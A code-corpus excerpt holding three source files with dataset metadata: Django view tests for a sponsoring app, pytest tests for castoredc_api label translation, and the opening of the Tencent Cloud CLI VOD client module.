r = self.client.get(reverse('dj_sponsoring:sponsor-file-create', kwargs={'pk': self.sponsor.id}))
self.assertEqual(r.status_code, 200)
self.assertEqual(str(r.content).count('<label'), 3)
self.assertEqual(str(r.content).count('</label>'), 3)
self.assertIn('Sponsor file name', str(r.content))
self.assertIn('Sponsor file', str(r.content))
self.assertIn('Sponsor file small description', str(r.content))
def test_sponsor_file_create_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can add sponsor file'))
r = self.client.post(reverse('dj_sponsoring:sponsor-file-create',
kwargs={'pk': self.sponsor.id}), data=self.dict)
s = SponsorFile.objects.last()
self.assertEqual(s.name, "My name")
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsor-file-detail', kwargs={'pk': s.id}))
self.assertTrue(os.path.isfile(
"{}/sponsors/{}/files/{}".format(settings.MEDIA_ROOT, s.sponsor.name, self.dict['file'].name)))
class TestSponsorFileUpdateView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
sponsor = Sponsor.objects.create(name="Toto")
self.dict = {
'sponsor': sponsor,
'file': SimpleUploadedFile(name='file.txt',
content=open("tests/file.txt", 'rb').read(),
content_type='text/plain'),
'name': "My name",
'description': "My description"
}
self.sf = SponsorFile.objects.create(**self.dict)
def test_sponsor_file_update_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-file-update', kwargs={'pk': self.sf.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/files/{}/update'.format(self.sf.id), r.url)
def test_sponsor_file_update_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-file-update', kwargs={'pk': self.sf.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/files/{}/update'.format(self.sf.id), r.url)
def test_sponsor_file_update_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-file-update', kwargs={'pk': self.sf.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/files/{}/update'.format(self.sf.id), r.url)
def test_sponsor_file_update_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-file-update', kwargs={'pk': self.sf.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/files/{}/update'.format(self.sf.id), r.url)
def test_sponsor_file_update_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can change sponsor file'))
r = self.client.get(reverse('dj_sponsoring:sponsor-file-update', kwargs={'pk': self.sf.id}))
self.assertEqual(r.status_code, 200)
self.assertEqual(str(r.content).count('<label'), 3)
self.assertEqual(str(r.content).count('</label>'), 3)
self.assertIn('Sponsor file name', str(r.content))
self.assertIn('My name', str(r.content))
self.assertIn('Sponsor file', str(r.content))
self.assertIn(self.sf.file.name, str(r.content))
self.assertIn('Sponsor file small description', str(r.content))
self.assertIn('My description', str(r.content))
def test_sponsor_file_update_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can change sponsor file'))
self.dict['name'] = 'My new name'
self.dict['file'] = SimpleUploadedFile(name='file.txt',
content=open("tests/file.txt", 'rb').read(),
content_type='text/plain'),
r = self.client.post(reverse('dj_sponsoring:sponsor-file-update',
kwargs={'pk': self.sf.id}), data=self.dict)
sf = SponsorFile.objects.get(id=self.sf.id)
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsor-file-detail', kwargs={'pk': sf.id}))
self.assertEqual(sf.name, 'My new name')
self.assertTrue(os.path.isfile("{}/{}".format(settings.MEDIA_ROOT, sf.file.name)))
class TestSponsorFileDeleteView(TestCase):
"""Tests."""
def setUp(self):
"""Tests."""
self.user = User.objects.create_user(username="username", password="password")
sponsor = Sponsor.objects.create(name="Toto")
self.dict = {
'sponsor': sponsor,
'file': SimpleUploadedFile(name='file.txt',
content=open("tests/file.txt", 'rb').read(),
content_type='text/plain'),
'name': "My name",
'description': "My description"
}
self.sf = SponsorFile.objects.create(**self.dict)
def test_sponsor_file_delete_view_get_as_anonymous(self):
"""Tests."""
r = self.client.get(reverse('dj_sponsoring:sponsor-file-delete', kwargs={'pk': self.sf.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/files/{}/delete'.format(self.sf.id), r.url)
def test_sponsor_file_delete_view_post_as_anonymous(self):
"""Tests."""
r = self.client.post(reverse('dj_sponsoring:sponsor-file-delete', kwargs={'pk': self.sf.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/files/{}/delete'.format(self.sf.id), r.url)
def test_sponsor_file_delete_view_get_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.get(reverse('dj_sponsoring:sponsor-file-delete', kwargs={'pk': self.sf.id}))
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/files/{}/delete'.format(self.sf.id), r.url)
def test_sponsor_file_delete_view_post_as_logged_with_wrong_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
r = self.client.post(reverse('dj_sponsoring:sponsor-file-delete', kwargs={'pk': self.sf.id}), self.dict)
self.assertEqual(r.status_code, 302)
self.assertIn('?next=/files/{}/delete'.format(self.sf.id), r.url)
def test_sponsor_file_delete_view_get_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can delete sponsor file'))
r = self.client.get(reverse('dj_sponsoring:sponsor-file-delete', kwargs={'pk': self.sf.id}))
self.assertEqual(r.status_code, 200)
self.assertIn("<h1 class=\"float-left\">{}</h1>".format(self.sf), str(r.content))
self.assertIn("<p>Do you really want to delete that file?</p>", str(r.content))
def test_sponsor_file_delete_view_post_as_logged_with_right_permissions(self):
"""Tests."""
self.assertTrue(self.user.is_active)
self.assertTrue(self.client.login(username="username", password="password"))
self.user.user_permissions.add(Permission.objects.get(name='Can delete sponsor file'))
self.assertEqual(SponsorFile.objects.count(), 1)
r = self.client.post(reverse('dj_sponsoring:sponsor-file-delete', kwargs={'pk': self.sf.id}))
self.assertEqual(SponsorFile.objects.count(), 0)
self.assertEqual(r.status_code, 302)
self.assertEqual(r.url, reverse('dj_sponsoring:sponsor-files-list', kwargs={'pk': self.sf.sponsor.id}))
| 47.458333
| 118
| 0.643572
| 4,917
| 39,865
| 5.06508
| 0.03315
| 0.062036
| 0.057217
| 0.075166
| 0.955029
| 0.940614
| 0.932383
| 0.927324
| 0.922184
| 0.901265
| 0
| 0.00728
| 0.197165
| 39,865
| 839
| 119
| 47.514899
| 0.77088
| 0.02087
| 0
| 0.714286
| 0
| 0
| 0.170942
| 0.077793
| 0
| 0
| 0
| 0
| 0.45068
| 1
| 0.136054
| false
| 0.076531
| 0.011905
| 0
| 0.173469
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
fc2c7a0f3dc7fb80215348c6f0e604fa473eef13
| 22,652
|
py
|
Python
|
tests/test_import/test_label_translation.py
|
andreasCastor/castoredc_api
|
ef0bd4eb8ac2efaa7e98e8462de7e5a7aa65a7f0
|
[
"MIT"
] | null | null | null |
tests/test_import/test_label_translation.py
|
andreasCastor/castoredc_api
|
ef0bd4eb8ac2efaa7e98e8462de7e5a7aa65a7f0
|
[
"MIT"
] | null | null | null |
tests/test_import/test_label_translation.py
|
andreasCastor/castoredc_api
|
ef0bd4eb8ac2efaa7e98e8462de7e5a7aa65a7f0
|
[
"MIT"
] | null | null | null |
import pytest
from castoredc_api_import.helpers import read_excel, castorize_column
class TestLabelTranslation:
"""Tests the helper functions for translation of external variable labels to Castor labels."""
# TODO: Create tests for fields other than radio with a dependency for other
@pytest.fixture(scope="class")
def study_label_data(self):
dataframe = read_excel("tests/test_import/data_files_for_import_tests/data_file_study_labels.xlsx")
return dataframe
@pytest.fixture(scope="class")
def medication_label_data(self):
dataframe = read_excel("tests/test_import/data_files_for_import_tests/data_file_report_medication_labels.xlsx")
return dataframe
@pytest.fixture(scope="class")
def survey_label_data(self):
dataframe = read_excel("tests/test_import/data_files_for_import_tests/data_file_survey_labels.xlsx")
return dataframe
def test_record_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a record field."""
column = study_label_data["patient"]
import_column = castorize_column(
to_import=column, new_name=["record_id"], label_data=True, study=import_study
)
assert import_column == {
"record_id": ["110001", "110002", "110003", "110004", "110005"]
}
def test_checkbox_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a checkbox field."""
column = study_label_data["family disease history"]
import_column = castorize_column(
to_import=column, new_name=["his_family"], label_data=True, study=import_study
)
assert import_column == {"his_family": ["2;3;4", "1;2", "0", "5;7", "8"]}
def test_date_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a date field."""
column = study_label_data["date baseline blood sample"]
import_column = castorize_column(
to_import=column, new_name=["base_bl_date"], label_data=True, study=import_study
)
assert import_column == {
"base_bl_date": [
"16-03-2021",
"17-03-2021",
"16-03-2022",
"17-03-2022",
"16-03-2023",
]
}
def test_datetime_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a datetime field."""
column = study_label_data["datetime onset stroke"]
import_column = castorize_column(
to_import=column, new_name=["onset_stroke"], label_data=True, study=import_study
)
assert import_column == {
"onset_stroke": [
"16-03-2021;07:30",
"17-03-2021;15:30",
"18-03-2022;02:00",
"17-03-2022;21:43",
"16-03-2023;07:22",
]
}
def test_dropdown_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a dropdown field."""
column = study_label_data["patient race"]
import_column = castorize_column(
to_import=column, new_name=["pat_race"], label_data=True, study=import_study
)
assert import_column == {"pat_race": ["1", "2", "3", "4", "5"]}
def test_numberdate_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a numberdate field."""
column = study_label_data["factor V Leiden"]
import_column = castorize_column(
to_import=column, new_name=["fac_V_leiden"], label_data=True, study=import_study
)
assert import_column == {
"fac_V_leiden": [
"55;16-03-2021",
"33;17-03-2021",
"-45;18-03-2022",
"28;19-03-2022",
"5;20-03-2023",
]
}
def test_numeric_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a number field."""
column = study_label_data["baseline hemoglobin"]
import_column = castorize_column(
to_import=column, new_name=["base_hb"], label_data=True, study=import_study
)
assert import_column == {"base_hb": ["8.3", "7.2", "9.1", "3.2", "10.3"]}
def test_radio_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a radio field."""
column = study_label_data["patient sex"]
import_column = castorize_column(
to_import=column, new_name=["pat_sex"], label_data=True, study=import_study
)
assert import_column == {"pat_sex": ["0", "0", "1", "1", "0"]}
def test_radio_field_with_dependency_success(self, medication_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a radio field with a dependency."""
column = medication_label_data["units"]
import_column = castorize_column(
to_import=column,
new_name=["med_units", "med_other_unit"],
label_data=True,
study=import_study,
)
assert import_column == {
"med_units": ["3", "7", "7", "2", "2"],
"med_other_unit": [None, "mg/4 weeks", "mg/8 weeks", None, None],
}
def test_slider_field_success(self, survey_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a slider field."""
column = survey_label_data["visual analog scale"]
import_column = castorize_column(
to_import=column, new_name=["VAS"], label_data=True, study=import_study
)
assert import_column == {"VAS": ["25", "88", "13"]}
def test_string_field_success(self, medication_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a string field."""
column = medication_label_data["medication"]
import_column = castorize_column(
to_import=column, new_name=["med_name"], label_data=False, study=import_study
)
assert import_column == {
"med_name": [
"Azathioprine",
"Vedolizumab",
"Ustekinumab",
"Thioguanine",
"Tofacitinib",
]
}
def test_time_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a time field."""
column = study_label_data["time onset trombectomy"]
import_column = castorize_column(
to_import=column,
new_name=["onset_trombectomy"],
label_data=True,
study=import_study,
)
assert import_column == {
"onset_trombectomy": ["09:25", "06:33", "12:24", "23:23", "08:14"]
}
def test_year_field_success(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a year field."""
column = study_label_data["year of birth"]
import_column = castorize_column(
to_import=column, new_name=["pat_birth_year"], label_data=True, study=import_study
)
assert import_column == {
"pat_birth_year": ["1999", "1956", "1945", "1933", "1921"]
}
class TestLabelTranslationMissing:
"""Tests the helper functions for translation of external variable labels to Castor labels with missing labels."""
@pytest.fixture(scope="class")
def study_label_data(self):
dataframe = read_excel("tests/test_import/data_files_for_import_tests/data_file_study_labels_missings.xlsx")
return dataframe
@pytest.fixture(scope="class")
def medication_label_data(self):
dataframe = read_excel(
"tests/test_import/data_files_for_import_tests/data_file_report_medication_labels_missings.xlsx"
)
return dataframe
@pytest.fixture(scope="class")
def survey_label_data(self):
dataframe = read_excel("tests/test_import/data_files_for_import_tests/data_file_survey_labels_missings.xlsx")
return dataframe
def test_record_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a record field."""
column = study_label_data["patient"]
import_column = castorize_column(
to_import=column, new_name=["record_id"], label_data=True, study=import_study
)
assert import_column == {
"record_id": ["110001", "110002", "110003", "110004", "110005"]
}
def test_checkbox_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a checkbox field."""
column = study_label_data["family disease history"]
import_column = castorize_column(
to_import=column, new_name=["his_family"], label_data=True, study=import_study
)
assert import_column == {"his_family": [None, None, "0", "5;7", "8"]}
def test_date_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a date field."""
column = study_label_data["date baseline blood sample"]
import_column = castorize_column(
to_import=column, new_name=["base_bl_date"], label_data=True, study=import_study
)
assert import_column == {
"base_bl_date": [
"16-03-2021",
"17-03-2021",
None,
"17-03-2022",
"16-03-2023",
]
}
def test_datetime_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a datetime field."""
column = study_label_data["datetime onset stroke"]
import_column = castorize_column(
to_import=column, new_name=["onset_stroke"], label_data=True, study=import_study
)
assert import_column == {
"onset_stroke": [
None,
"17-03-2021;15:30",
"18-03-2022;02:00",
"17-03-2022;21:43",
"16-03-2023;07:22",
]
}
def test_dropdown_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a dropdown field."""
column = study_label_data["patient race"]
import_column = castorize_column(
to_import=column, new_name=["pat_race"], label_data=True, study=import_study
)
assert import_column == {"pat_race": ["1", "2", None, "4", "5"]}
def test_numberdate_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a numberdate field."""
column = study_label_data["factor V Leiden"]
import_column = castorize_column(
to_import=column, new_name=["fac_V_leiden"], label_data=True, study=import_study
)
assert import_column == {
"fac_V_leiden": [
"55;16-03-2021",
"33;17-03-2021",
"-45;18-03-2022",
None,
"5;20-03-2023",
]
}
def test_numeric_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a number field."""
column = study_label_data["baseline hemoglobin"]
import_column = castorize_column(
to_import=column, new_name=["base_hb"], label_data=True, study=import_study
)
assert import_column == {"base_hb": ["8.3", None, "9.1", "3.2", "10.3"]}
def test_radio_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a radio field with missings."""
column = study_label_data["patient sex"]
import_column = castorize_column(
to_import=column, new_name=["pat_sex"], label_data=True, study=import_study
)
assert import_column == {"pat_sex": ["0", "0", None, "1", "0"]}
def test_radio_field_with_dependency_missing(self, medication_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a radio field with a dependency and missings."""
column = medication_label_data["units"]
import_column = castorize_column(
to_import=column,
new_name=["med_units", "med_other_unit"],
label_data=True,
study=import_study,
)
assert import_column == {
"med_units": ["3", None, "7", "2", None],
"med_other_unit": [None, None, "mg/8 weeks", None, None],
}
def test_slider_field_missing(self, survey_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a slider field with missings."""
column = survey_label_data["visual analog scale"]
import_column = castorize_column(
to_import=column, new_name=["VAS"], label_data=True, study=import_study
)
assert import_column == {"VAS": ["25", None, "13"]}
def test_string_field_missing(self, medication_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a string field."""
column = medication_label_data["medication"]
import_column = castorize_column(
to_import=column, new_name=["med_name"], label_data=False, study=import_study
)
assert import_column == {
"med_name": ["Azathioprine", None, None, "Thioguanine", "Tofacitinib"]
}
def test_time_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a time field."""
column = study_label_data["time onset trombectomy"]
import_column = castorize_column(
to_import=column,
new_name=["onset_trombectomy"],
label_data=True,
study=import_study,
)
assert import_column == {
"onset_trombectomy": ["09:25", "06:33", "12:24", None, "08:14"]
}
def test_year_field_missing(self, study_label_data, import_study):
"""Tests whether the proper format is returned when castorizing a year field."""
column = study_label_data["year of birth"]
import_column = castorize_column(
to_import=column, new_name=["pat_birth_year"], label_data=True, study=import_study
)
assert import_column == {"pat_birth_year": ["1999", None, None, None, "1921"]}
class TestLabelTranslationFail:
"""Tests the helper functions for translation of erronous external variable labels to Castor labels."""
@pytest.fixture(scope="class")
def study_label_data_error(self):
dataframe = read_excel("tests/test_import/data_files_for_import_tests/data_file_study_labels_errors.xlsx")
return dataframe
@pytest.fixture(scope="class")
def medication_label_data_error(self):
dataframe = read_excel(
"tests/test_import/data_files_for_import_tests/data_file_report_medication_labels_errors.xlsx"
)
return dataframe
@pytest.fixture(scope="class")
def survey_label_data_error(self):
dataframe = read_excel("tests/test_import/data_files_for_import_tests/data_file_survey_labels_errors.xlsx")
return dataframe
def test_record_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a record field."""
column = study_label_data_error["patient"]
import_column = castorize_column(
to_import=column, new_name=["record_id"], label_data=True, study=import_study
)
# Record checking fails at the import stage
assert import_column == {"record_id": ["a", "b", "c", "d", "e"]}
def test_checkbox_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a checkbox field."""
column = study_label_data_error["family disease history"]
import_column = castorize_column(
to_import=column, new_name=["his_family"], label_data=True, study=import_study
)
assert import_column == {
"his_family": [
"Error;Error;Error",
"Error",
"Error",
"Error;Error;Error",
"Error",
]
}
def test_date_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a date field."""
column = study_label_data_error["date baseline blood sample"]
import_column = castorize_column(
to_import=column, new_name=["base_bl_date"], label_data=True, study=import_study
)
assert import_column == {
"base_bl_date": ["Error", "Error", "Error", "Error", "Error"]
}
def test_datetime_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a datetime field."""
column = study_label_data_error["datetime onset stroke"]
import_column = castorize_column(
to_import=column, new_name=["onset_stroke"], label_data=True, study=import_study
)
assert import_column == {
"onset_stroke": ["Error", "Error", "Error", "Error", "Error"]
}
def test_dropdown_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a dropdown field."""
column = study_label_data_error["patient race"]
import_column = castorize_column(
to_import=column, new_name=["pat_race"], label_data=True, study=import_study
)
assert import_column == {
"pat_race": ["Error", "Error", "Error", "Error;Error", "Error"]
}
def test_numberdate_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a numberdate field."""
column = study_label_data_error["factor V Leiden"]
import_column = castorize_column(
to_import=column, new_name=["fac_V_leiden"], label_data=True, study=import_study
)
assert import_column == {
"fac_V_leiden": [
"Error",
"33;Error",
"Error;18-03-2022",
"28;Error",
"5;02-03-2023",
]
}
def test_numeric_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a number field."""
column = study_label_data_error["baseline hemoglobin"]
import_column = castorize_column(
to_import=column, new_name=["base_hb"], label_data=True, study=import_study
)
assert import_column == {
"base_hb": ["Error", "Error", "Error", "Error", "Error"]
}
def test_radio_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a radio field."""
column = study_label_data_error["patient sex"]
import_column = castorize_column(
to_import=column, new_name=["pat_sex"], label_data=True, study=import_study
)
assert import_column == {
"pat_sex": ["Error", "Error", "Error", "Error", "Error"]
}
def test_radio_field_with_dependency_fail(self, medication_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a radio field with a dependency."""
column = medication_label_data_error["units"]
import_column = castorize_column(
to_import=column,
new_name=["med_units", "med_other_unit"],
label_data=True,
study=import_study,
)
assert import_column == {
"med_units": ["7", "7", "7", "7", "7"],
"med_other_unit": ["also", "not wrong", "because", "text", "dependency"],
}
def test_slider_field_fail(self, survey_label_data_error, import_study):
"""Tests whether the proper format is returned when castorizing a slider field with errors."""
column = survey_label_data_error["visual analog scale"]
import_column = castorize_column(
to_import=column, new_name=["VAS"], label_data=True, study=import_study
)
assert import_column == {"VAS": ["Error", "Error", "Error"]}
def test_string_field_fail(self, medication_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a string field."""
column = medication_label_data_error["medication"]
import_column = castorize_column(
to_import=column, new_name=["med_name"], label_data=False, study=import_study
)
assert import_column == {"med_name": ["cant", "be", "wrong", "cuz", "text"]}
def test_time_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a time field."""
column = study_label_data_error["time onset trombectomy"]
import_column = castorize_column(
to_import=column,
new_name=["onset_trombectomy"],
label_data=True,
study=import_study,
)
assert import_column == {
"onset_trombectomy": ["Error", "Error", "Error", "Error", "Error"]
}
def test_year_field_fail(self, study_label_data_error, import_study):
"""Tests whether the proper error is returned when castorizing a year field."""
column = study_label_data_error["year of birth"]
import_column = castorize_column(
to_import=column, new_name=["pat_birth_year"], label_data=True, study=import_study
)
assert import_column == {
"pat_birth_year": ["Error", "Error", "Error", "Error", "Error"]
}
| 44.855446
| 120
| 0.635132
| 2,747
| 22,652
| 4.933746
| 0.069166
| 0.083672
| 0.065078
| 0.066185
| 0.94385
| 0.933742
| 0.91655
| 0.898399
| 0.881355
| 0.866303
| 0
| 0.029104
| 0.256754
| 22,652
| 504
| 121
| 44.944444
| 0.775897
| 0.155262
| 0
| 0.532178
| 0
| 0
| 0.173863
| 0.039317
| 0
| 0
| 0
| 0.001984
| 0.096535
| 1
| 0.118812
| false
| 0
| 0.428218
| 0
| 0.576733
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
fc33c0481541659ad0ca6611cdf36ceec3c0ad35
| 131,711
|
py
|
Python
|
tccli/services/vod/vod_client.py
|
ivandksun/tencentcloud-cli-intl-en
|
41b84e339918961b8bc92f7498e56347d21e16d3
|
[
"Apache-2.0"
] | null | null | null |
tccli/services/vod/vod_client.py
|
ivandksun/tencentcloud-cli-intl-en
|
41b84e339918961b8bc92f7498e56347d21e16d3
|
[
"Apache-2.0"
] | 1
|
2022-02-07T13:39:09.000Z
|
2022-02-07T13:39:09.000Z
|
tccli/services/vod/vod_client.py
|
ivandksun/tencentcloud-cli-intl-en
|
41b84e339918961b8bc92f7498e56347d21e16d3
|
[
"Apache-2.0"
] | 4
|
2020-07-20T01:51:58.000Z
|
2021-08-13T08:25:22.000Z
|
# -*- coding: utf-8 -*-
import os
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli import __version__
from tccli.utils import Utils
from tccli.exceptions import ConfigurationError
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.vod.v20180717 import vod_client as vod_client_v20180717
from tencentcloud.vod.v20180717 import models as models_v20180717
def doCreateSnapshotByTimeOffsetTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateSnapshotByTimeOffsetTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateSnapshotByTimeOffsetTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEditMedia(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.EditMediaRequest()
model.from_json_string(json.dumps(args))
rsp = client.EditMedia(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeVodDomains(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeVodDomainsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeVodDomains(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doApplyUpload(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ApplyUploadRequest()
model.from_json_string(json.dumps(args))
rsp = client.ApplyUpload(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteAnimatedGraphicsTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteAnimatedGraphicsTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteAnimatedGraphicsTemplate(model)
